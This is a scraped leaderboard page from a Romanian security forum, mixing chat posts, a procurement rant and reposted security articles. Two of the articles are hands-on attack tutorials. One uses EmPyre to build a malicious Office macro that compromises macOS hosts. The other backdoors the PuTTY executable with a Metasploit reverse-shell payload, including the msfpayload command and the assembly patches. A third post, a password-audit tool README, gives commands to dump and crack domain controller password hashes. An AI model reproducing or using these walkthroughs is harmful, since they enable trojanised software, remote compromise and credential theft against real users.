Jump to content

Leaderboard

Popular Content

Showing content with the highest reputation on 12/06/16 in all areas

  1. Salut RST! Cum va mai merge? Sper ca bine Ma numesc Cosmin si am 24 ani. Am crescut in Romania dar am plecat si eu din cotet destul de recent iar acum sunt stabilit in sua. Prima oara cand am interactionat cu cod-ul a fost in clasa a 9a(mate info ofc). Materia aia jalnica din liceu am stapanit-o fara nici un fel de efort dar nu am incercat niciodata sa ma ridic mai sus. In anul 2 de facultate(info universitate buc) mi-am dat seama ca nu-i de mine programarea la nivel inalt. Incepuse sa nu imi mai placa si nu avea rost sa incerc sa avansez pe plan profesional cu asta; asa ca am abandonat. In timpul asta am acumulat notiuni de c+, c#, java, assembler, html, php, css dar nimic wow. Mi-am dat seama ca fara it alte sanse nu sunt asa ca am inceput sa trag spre partea de internet marketing. Dupa aproape 2 ani de research, nopti pierdute si bani investiti prost am reusit sa gasesc "directia potrivita". Acum, impreuna cu un coleg de liceu, detinem o firma de seo pe care am construit-o in ultimul an. Momentan avem o evolutie destul de buna. Inca invatam, construim relatii si assets care tintesc spre long-term. Cel mai greu a fost la partea de sales/client getting caci multi business owners nu prea inteleg potentialul imens din seo - din fericire am gasit un sales guy foarte priceput. Hobby-uri: IT, istorie, arta Cam atat despre mine. Cum am descoperit rst nu mai tin minte dar crawluiesc forum-ul regulat de vreo 6 ani fara sa interactionez - o sa schimb asta pe viitor. Ce asteptari am de la rst: Am venit aici cu scopul de a ma informa iar in timp am realizat ca voi,de-a lungul anilor, ati reusit sa creeati o comunitate mai mult decat interesanta. High quality troll, smart people and hacking is a deadly combo for me ! Thanks for your time guys !
    4 points
  2. 4 points
  3. Lasa Lasa ba new-line-urile! Inainte de asta, spune-i sa invete sa foloseasca un for(), ca daca ii ziceau aia sa faca tabla inmultirii unui numar pana la 100 si acum mai scria la codu' ala. Pe langa asta, invata sa postezi cum trebuie. Mie unu' mi-e sila cand vad useri care nu se straduiesc sa indenteze cum trebuie codu' postat aici. (asta daca vrei pareri legate de ceea ce ai postat) Macar ai incercat, e de apreciat. Ar fi frumos sa vad membri care se straduiesc sa invete si cer sfatul aici. La mai mult ! PS: Apropo, astea nu-s proiecte. Sunt exercitii basic pe care le invata un pusti de clasa a 5-a. (si le-ai facut...uhm, prost)
    3 points
  4. Chiar daca se gasesc separat, am facut arhiva cu tot ce-i de la humble bundle. https://www.humblebundle.com/books/unix-book-bundle https://mega.nz/#!owdyTISD!d2af-rcMdtnUdsyiFYC29WhUAlr1x7qtCbDjU1BoRHk
    2 points
  5. Hacking Mac With EmPyre October 12, 2016 lukeager I am the stereotypical Apple fan boy that other bloggers write about. We have MacBook Pro’s, Air’s, Apple TV’s, iPhone’s and iPad’s and even subscribe to Apple Music. You literally couldn’t find someone who has become more brainwashed by a brand…BUT, I am still not blinded by the security misconceptions which are rife within the world of Mac users. To try and understand just how wide spread these misconceptions were I recently did a poll on a facebook group dedicated to Mac products and asked the following question: Do you think Mac/iMacs need an AntiVirus? The results were staggering and showed that over 90% of participants (There were over 150 participants before the post was removed by an Admin because he wouldn’t entertain any talk of Mac’s having AV) believed that Mac’s do not need an AV. The comments were even more staggering and filled with all kinds of crazy talk from “Mac’s cannot get malware” through to “Malware can only infect your Mac if you enter your admin password” and even went into heated debates debating the differences between Trojans, Viruses and Worms and which impacted Mac users. Of course the bottom line was that almost nobody really understood that the risks are just as real on Mac as they are on Windows, just less common. Mac users get unwanted software, viruses, trojans and can be hacked, and with a little help from Adaptive Threat, we are going to prove it. So, lets have some fun and look at how to hack into Mac OSX hosts using Social Engineering and Malicious Office Documents. Introducing EmPyre edit: I added a new video tutorial to walk through the whole blog below.. EmPyre is a Post Exploitation framework built using Python which offers Ethical Hackers & Baddies(don’t do it) the ability to remotely access OSX hosts. It’s easy to use, has OSX Specific exploits and payloads already built in, and it actually makes for a refreshing change from Metasploit. Visit them on Github to read the nitty gritty about features and support. Installation is easy from another Unix host like Kali which comes with Git installed already. If you are using OSX or another distro, make sure you have Git installed before you begin. I’m using a fresh Kali install. Install EmPyre First, Git Clone from https://github.com/adaptivethreat/EmPyre/ You should now have a folder called EmPyre, and you’ll want to run install.sh to finish the install. That’s it, EmPyre is installed and ready to go, now just change directory in to EmPyre and run ./empyre to launch the interface. Once you do that, EmPyre will load up and you will see the following menu. Create A Listener Before you do anything, type the help command and check out the options you have, i’d suggest spending some time learning what you can do with the tool. For now, we want to start a listener for our victims to connect back too (y’know – the Macs that don’t need AV). Go to the listeners menu…and type options to view the current listener options. This is your equivalent of “show options” within Metasploit. When you hit enter you will see the current settings for the default listener which is called test. You can see the local IP and all the other options which are fine for this guide but you can change anything that suits your objective. Now, if you decide to get a little fruity here, it’s on you, but to change any of these, you’ll want to set one of the fields and change it accordingly. For instance, changing the host is useful if you are wanting to NAT your IP and go out over the internet like some kind of savage. Once you are happy with your options, just hit run , followed by your listener name which you can see in the options. Thats it, we are listening for shells. Now, if you are running this in a lab, just make sure you can reach the target machine and networking is all good. If you are using this against a remote host outside of your LAN, then you should move on to configuring NAT and any rules you need to let the traffic come in. You’re on your own with that. Create The Malicious Document This is not so different to attacking windows machines but you’re gonna have the extra helping hand from EmPyre to make things a little easier. First, we need to create the malicious office macro. You can return to the main menu by entering “main” and then we want to enter “usestager“. You can press tab to list all the available options but we will be using a macro for this attack. Almost there… now, we just need to tell the stager which listener we want it to use which should be easy since we only have 1 created, and then we wrap it up by generating the macro. If all goes to plan, you should see the macro outputted to the screen(unless you set an output location in the options) We want to copy this output into an office document and enter into a macro. Open excel or word and save the document as a macro enabled document. Once you have saved it, head over to tools and create a new macro, name it and then paste the code from your EmPyre host into the Macro. It should look like this. (Note – If you are targeting x64 architecture you will need to edit the first line to begin “Private Declare PtrSafe Function”) Save the document and let the games begin. The next time you open this document you should be prompted to enable macros which of course we will (why wouldn’t we!). Once you hit Enable Macros… Excel will play ball and execute the macro hidden away inside Excel. Over in the attack machine we can see the fruits of our labour with an agent checking in. This can sometimes take a second but no more than around 10-15 seconds. You’re going to want to then begin interacting with your newly infected Mac host. EmPyre calls them agents, so just enter the agents command. Notice the string which begins UKFOM…. this is the unique identifier EmPyre has given the host. In order to interact with that host you just need to type the following, but remember to substitute the identifier for whatever yours is called.(you can rename it) From here, you can start throwing shell code around like some kind of maniac. Try some of the built in modules, there are tons of them and some of them are pretty useful. My personal favourite is troll/osx/say but if you want to list them all, just use tab complete on the end of usemodule Of course, like every other screen you can issue the help command and see all the other options you have. Why not drop into the victims Shell, query the sysinfo or execute python code directly onto the host? And that’s it, now go pop some Macs. But first, lets take a moment to think about the original question. Do Macs need AntiVirus? Malware might not be as prolific on OSX as it is on Windows, but the concept is the same. Attackers can gain access to your machines in almost the same way they do Windows hosts. Some might argue that AV is not effective against targeted attacks, and I would agree, but right now, attacks are becoming more and more sophisticated and with the rise of OSX users, it’s only a matter of time before we see a shift in Apple users becoming bigger targets. Thanks for reading, please subscribe and follow me on Twitter/Instagram/LinkedIn using the links at the top of the page. Sursa: http://www.disinfosec.com/2016/10/12/hacking-mac/ Sursa: http://www.disinfosec.com/2016/10/12/hacking-mac/
    2 points
  6. It was that very moment when I figured out my life wasn't meaningless:
    2 points
  7. Format PDF: http://www30.zippyshare.com/v/fQhT9gDz/file.html Have Funk!
    1 point
  8. Acum 3-4 luni, m-am apucat de C++; va prezint niste proiecte facute de mine. Cate secunde, minute, ore, zile(la saptamana) are x zi/zile sau/si y saptamana/saptamani: P.S.: puteam sa pun cout <<"x"<<operatie<<endl; dar atunci nu stiam chiar asa de bine...(de parca acu' stiu multe... da' stiu putin mai bine decat atunci). Se dau doua numere, x si y, sa se calculeze, pe rand, media aritmetica si media geometrica a acestor numere: Tabla inmultirii; se da un numar x. Sa se afiseze tabla inmultirii pana la 15 cu acel numar.
    1 point
  9. Introduction: Portable Executable (PE) files are very commonly used today. Many people download these files from the internet or get it from a friend and run it on their systems without realizing the dangers involved in running these kind of files. It is very easy to add malicious code to these files and have it executed on the victim’s machine without the victim’s knowledge. Objective: In this article, we would be looking at how to backdoor a Windows executable file. We will be using the popular putty executable and backdoor it with a reverse shell. The Objective is to ensure that the modified putty executable gives a reverse shell back to the attacker’s machine and at the same time continues to function normally without any issues. We would not be using any kind of automated tools to backdoor this putty executable. However, we will be doing this manually to understand how this entire process works. Limitations: To follow the steps in this article, it is important to have basic knowledge of assembly language and a general familiarity with a Debugger (we will be using Immunity in this case) and its usage. Analysis: 1) We will be injecting our malicious reverse shellcode into the putty executable. To do this first, we need to add the malicious code to the putty executable. This code can be placed directly in the executable (provided there is enough space) via a debugger otherwise; we can use a PE Editor tool (like Lord PE) to add a new section to the putty executable which can be used to place our shellcode in the binary. I will be using the PE Editor tool to add a new section to the executable 2) We will open up the putty executable in the Lord PE tool and add a new section header to it. After adding a new section header, we will select the New Section header (NewSec) and hit the edit section header option. At this point, we will add 1000 bytes to the Virtual Size and the Raw Size of the executable. Also, we will click on the flags options and ensure that this newly added section is marked as “Executable as code.” We will save the changes made to the putty executable. 2) Now if we try to launch the executable, we will get an error telling us that this executable is not a valid binary file. Rightly so, since we have added a new section to the binary and left it empty. So now we will use a hex-editor to add the extra 1000 bytes to the binary. We will open the executable file in a hex editor (like XVI32) and insert a hex string of 1000 \x90 instructions at the end of the file. We will save the file and verify that the putty executable is now working fine. 3) Now that we have added extra space for our code. It is time to add our malicious reverse shellcode in this space. Before we do this, we have to hijack the entry point of the program and then redirect the execution of the putty executable to the newly added space which holds the shellcode and after executing the shellcode, we will redirect the flow back to the normal execution of the program. The Below diagram will give a clear picture of what we intend to do: 4) So let us start by hijacking the entry point of the program. At this point, we will load the putty executable in the immunity debugger and make a note of the entry points of the program. The entry point instructions of the putty executable are:- 004550F0 > $ 6A 60 PUSH 60 004550F2 . 68 08814700 PUSH putty.00478108 004550F7 . E8 08210000 CALL putty.00457204 004550FC . BF 94000000 MOV EDI,94 00455101 . 8BC7 MOV EAX,EDI We will hijack the entry point by overwriting the third instruction with a redirection to our malicious code. 5) Next, we have to search for the address of our newly added section (which will hold the malicious code) in the putty executable file. To do this simply hit the “M” tab at the top in immunity debugger. This will open up the memory map of the program where the name and the address of the newly added section can be viewed. In my case, the newly added section starts at this address: 00485BB0 6) So now we proceed to hijack the entry point of the program by overwriting the third instruction with a JMP instruction to the address of the newly added section. (i.e.,. 00485BB0). We will refer to this newly added section as the Code-Cave (since it will hold our malicious code) After having made the changes, we will select the changes we have made and do a right click and select the option to Copy to Executable. Then save this file and rename it as Putty01.exe 7) We now open this new file Putty01.exe in the debugger and then step through (by pressing the F7 button) the initial instructions and then take a JMP to the code cave. 8) From this point onwards we are free to write our code in the putty executable. Before we start writing our shellcode, we will have to save the current state of registers and flags. We can do this with the following two instructions: PUSHAD PUSHFD Also, we have to make a note of the Address of the ESP Register since we would have to realign the position of the ESP register back to this original address after writing the shellcode. The value of the ESP at the time of saving the registers and flags is 0012FFA0. 9) The Next step will be to create a Metasploit generated shellcode. This shellcode should be in hex format so we can copy it to the debugger directly. I have used the following command to generate the shellcode: msfpayload windows/shell_reverse_tcp LHOST=192.168.11.151 LPORT=443 EXITFUNC=seh R | hexdump -C | sed ‘$d’ | cut -d’ ‘ -f3-19 | tr -d ‘ ‘ | tr -d ‘\n’ We copy this Metasploit generated shellcode and paste it directly after the register saving instructions in the immunity debugger. Make sure you select a large number of NOP instruction to ensure that entire shellcode is pasted properly, and no part is missing. 10) Now that we have pasted the shellcode let us go ahead and select all the changes we have made to the binary and copy it to an executable. Then save the file and rename it as Putty02.exe 11) Now let us open the putty executable and step through the instructions (by pressing F7) and let us place a breakpoint (by pressing F2) at the NOP instruction after the end of the shellcode. At this breakpoint make a note of the address of the ESP Register. In my case, the value of the ESP Register is 0012FDA8. We have to restore the value of ESP to its original state which is 0012FFA0. Hence, we subtract the current value of ESP with its original value. (i.e.,. 0012FFA0-0012FDA8=1F8). This means that this value 1F8 when added to the current register 0012FDA8 will reset it to 0012FFA0 thus restoring ESP back to its original address. We will add 1F8 to the ESP register to restore it back to its original state. ADD ESP,1F8. 12) Now we will have to restore back the current state of registers and flags which we had saved earlier. We will use the following instructions to do this:- POPFD POPAD After this, we will redirect the control flow of the program to its normal execution. We will call the instruction which we had overwritten and then JMP to the next instruction. CALL 00457204 JMP 004550FC This will ensure that the normal flow of the program continues and the putty executable opens without any issues. 13) Now we can again select all the changes we have made and copy them to Executable. Then save the file and rename it as Putty03.exe. Now if we set up a listener and launch the program, we will be able to get the reverse shell connection back from the putty executable. However, the putty executable file never launches. In fact only after we exit from the reverse shell, the putty executable opens up. This obviously is not an ideal scenario for any attack to be successful. 14) If we further examine the reverse shellcode carefully, we would notice that the program stops execution on the “WaitforSingleObject” method. This is because the Metasploit generated shellcode passes an argument of “-1” to this method which effectively tells the putty executable to stop the execution till the reverse shell is not terminated. What we have to do to avoid this is to find the instruction which passes the “-1” argument and change its value. In my case, the DEC ESI, PUSH ESI, and INC ESI instructions are responsible for passing the “-1” argument. What this instruction set does is that it decreases ESI from 00000000 (0) to FFFFFFFF (-1) then pushes it, essentially a PUSH -1 instruction, and increases it back to 00000000 (0) To ensure that the “-1” argument is not passed, I had to simply convert the instructions “DEC ESI” & “INC ESI” to “NOP” and then select all the changes made and copy them to executables. Then save the file and rename it as Putty04.exe 15) Now we can launch the Putty executable and set up a listener and successfully catch the reverse shell without any issues. Conclusion: We can see that back-dooring PE Executable on Windows is not a very challenging task. Hence, it is highly advisable to avoid running executable from unknown sources without properly verifying what it is doing Sursa: http://resources.infosecinstitute.com/back-dooring-pe-files-windows/
    1 point
  10. a avut noroc de un shellcode ce si-a creat propriul thread si a rulat fara sa deranjeze programul principal, ca putea sa astepte mult si bine pana ii aparea fereastra de la putty
    1 point
  11. Domain Password Audit Tool (DPAT) This is a python script that will generate password use statistics from password hashes dumped from a domain controller and a password crack file such as oclHashcat.pot generated from the oclHashcat tool during password cracking. The report is an HTML report with clickable links. If you would like to click through an example report you can do so here. You can run the python script at follows. dpat.py -n customer.ntds -c oclHashcat.pot -g "Domain Admins.txt" "Enterprise Admins.txt" Note that the group lists at the end (-g "Domain Admins.txt "Enterprise Admins.txt") are optional. Try this out on the example files provied in the sample_data folder of this project. The sample data was built from census data for common first and last names and passwords from the well known rockyou list. Your customer.ntds file should be in this format: domain\username:RID:lmhash:nthash::: You can get this file by first dumping the password hashes from your domain controller by executing the following command in an administrative command prompt on a domain controller. Just make sure you have enough disk space to store the output in c:\temp. The amount of space needed will be slightly larger than the size of the ntds.dit file that is currently on the disk, as this performs a backup of that file and some registry settings. ntdsutil "ac in ntds" "ifm" "cr fu c:\temp" q q You can then turn this output into the needed format using secretsdump.py secretsdump.py -system registry/SYSTEM -ntds Active\ Directory/ntds.dit LOCAL -outputfile customer The command above will create a file called "customer.ntds" which you will use with this tool as well as for password cracking. Your oclHashcat file should be in this format: nthash:password Or for LM Hashes: lmhashLeftOrRight:leftOrRightHalfPasswordUpcased The DPAT tool also supports output from John the Ripper (same format as oclHashcat.pot but prepended with $NT$ or $LM$) The optional "-g" option is followed by a list of any number of files containing lists of users who are in the given group such as "Enterprise Admins" or "Domain Admins". The file can be in the format output by the PowerView PowerShell script as shown in the example below: Get-NetGroupMember -GroupName "Domain Admins" > "Domain Admins.txt" or to read a group from another domain use something like the following (note that name of the other domain and the domain controller can be obtained with Get-NetForestDomain) Get-NetGroupMember -GroupName "Enterprise Admins" -Domain "some.domain.com" -DomainController "DC01.some.domain.com" > "Enterprise Admins.txt" Alternatively, the group files can simply be a list of users, one per line, in the following format: domain\username The Domain Password Audit Tool also has the handy feature to finish cracking the LM hashes for any hashes where the NT hash was not cracked. This asssumes that you have used oclHashcat to brute force all 7 character passwords with the following command: ./oclHashcat64.bin -m 3000 -a 3 customer.ntds -1 ?a ?1?1?1?1?1?1?1 --increment Or to crack LM hashes with John the Ripper instead: john --format=LM customer.ntds To see all available DPAT options use the '-h' or '--help' option usage: dpat.py [-h] -n NTDSFILE -c CRACKFILE [-o OUTPUTFILE] [-d REPORTDIRECTORY] [-w] [-s] [-g [GROUPLISTS [GROUPLISTS ...]]] This script will perfrom a domain password audit based on an extracted NTDS file and password cracking output such as oclHashcat. optional arguments: -h, --help show this help message and exit -n NTDSFILE, --ntdsfile NTDSFILE NTDS file name (output from SecretsDump.py) -c CRACKFILE, --crackfile CRACKFILE Password Cracking output in the default form output by oclHashcat, such as oclHashcat.pot -o OUTPUTFILE, --outputfile OUTPUTFILE The name of the HTML report output file, defaults to _DomainPasswordAuditReport.html -d REPORTDIRECTORY, --reportdirectory REPORTDIRECTORY Folder containing the output HTML files, defaults to DPAT Report -w, --writedb Write the SQLite database info to disk for offline inspection instead of just in memory. Filename will be "pass_audit.db" -s, --sanitize Sanitize the report by partially redacting passwords and hashes. Prepends the report directory with "Sanitized - " -g [GROUPLISTS [GROUPLISTS ...]], --grouplists [GROUPLISTS [GROUPLISTS ...]] The name of one or multiple files that contain lists of usernames in particular groups. The group names will be taken from the file name itself. The username list must be in the same format as found in the NTDS file such as some.ad.domain.com\username. Example: -g "Domain Admins.txt" "Enterprise Admins.txt" Sponsors Sursa: https://github.com/clr2of8/DPAT
    1 point
  12. INFILTRATE 2016: Genetic Malware - Travis Morrow / Josh Pitts from Immunity VideosPRO 3 months ago
    1 point
  13. „12-13 companii au câștigat cam toate contractele. Mare parte din aceste platforme nu sunt folosite, unele nu sunt operaționalizate. Experiența la Guvern arată că se pot face lucruri de impact cu costuri rezonabile", a declarat șeful Executivului. „Din analiza acestor informații a rezultat că un număr de 19 entități publice au achiziționat produse și licențe software și au încheiat peste 10.000 de contracte/comenzi, în valoare totală de 3.733.043.559,97 RON, cu TVA, pentru care a fost plătită suma totală de 3.131.204.615,99 RON, cu TVA”, se arată în raportul Corpului de control referitor la achiziția de produse software la nivelul instituțiilor publice, făcut public luni. 1. SIVECO ROMANIA S.A. – 377.863.422,40 RON/90 de contracte/comenzi/22 de autorități contractante; 2. GRUPUL TEAMNET – 261.703.671,87 RON/27 contracte/comenzi/19 autorități contractante; 3. UTI GRUP – 108.178.738,49 RON/313 contracte/comenzi/46 autorități contractante; 4. BION ADVANCED SUPPORT TEAM S.R.L. – 102.226.581,70 RON/13 contracte/comenzi/11 autorități contractante 5. ROMSYS S.R.L. – 97.759.864,15 RON/92 contracte/comenzi/27 autorități contractante; 6. TELEKOM ROMANIA COMMUNICATIONS S.A.– 96.836.722,70 RON/13 contracte/comenzi/7 autorități contractante; 7. NET BRINEL S.A. – 64.017.194,25 RON/179 contracte/comenzi/50 autorități contractante; 8. QUALITY BUSINESS SOLUTIONS S.R.L. – 59.090.498,97 RON/7 contracte/comenzi/3 autorități contractante; 9. NOVENSYS CORPORATIONS S.R.L. – 59.029.777,38 RON/6 contracte/comenzi/6 autorități contractante; 10. INTRAROM S.A. – 46.174.401,20 RON/6 contracte/comenzi/5 autorități contractante; 11. INFORMATICA FEROVIARA S.A. – 41.359.664,80 RON/12 contracte/comenzi/2 autorități contractante; 12. OPEN GOV S.R.L. – 36.428.094,70 RON/4 contracte/comenzi/3 autorități contractante; 13. TANGIBLE CORPORATION S.R.L. – 25.543.259,35 RON/3 contracte/comenzi/3 autorități contractante; 14. ASESOFT INTERNATIONAL S.A. – 25.128.186,35 RON/6 contracte/comenzi/4 autorități contractante. Restul: https://republica.ro/dacian-ciolos-sunt-12-13-companii-care-au-castigat-cam-toate-contractele-it-cu-statul-in-ultimii-cinci Pareri? Aproape 1 miliard dolari pentru cacaturi care nu functioneaza. Nici firmele din Silicon Valley nu primesc atat pentru programe care functioneaza.
    1 point
  14. Linux Fundamentals Paul Cobbaut Publication date 2015-05-24 CEST Abstract This book is meant to be used in an instructor-led training. For self-study, the intent is to read this book next to a working Linux computer so you can immediately do every subject, practicing each command. This book is aimed at novice Linux system administrators (and might be interesting and useful for home users that want to know a bit more about their Linux system). However, this book is not meant as an introduction to Linux desktop applications like text editors, browsers, mail clients, multimedia or office applications. More information and free .pdf available at http://linux-training.be . Download: http://linux-training.be/linuxfun.pdf
    1 point
  15. Exploiting 64-bit IE on Windows 8.1 – The Pwn2Own Case Study - Presented By Yuki Chen and Linan Hao
    1 point
  16. Probabil nici una. 1 post, nickname de fata, ca stie ca multi calculatoristi sunt no-liferi labari. O sa facem conversatie, o sa-i dam idei. Cred ca mai mult il (o) intereseaza partea cu "exemplele concrete". Ii dam ce vrea, dispare de pe RST. "I-am facut pe fraieri!". Morala?
    1 point
  17. Am primit prin pm multe detalii despre site.Desi nu e ce vroiam,in sensul ca nu e un site clasic xxx,totusi ideea e geniala,parerea mea.E vorba de interactiunea dintre vizitatori in acest domeniu.Cred ca daca cineva investeste in promovare la un nivel mai inalt,poate da lovitura.
    -1 points
×
×
  • Create New...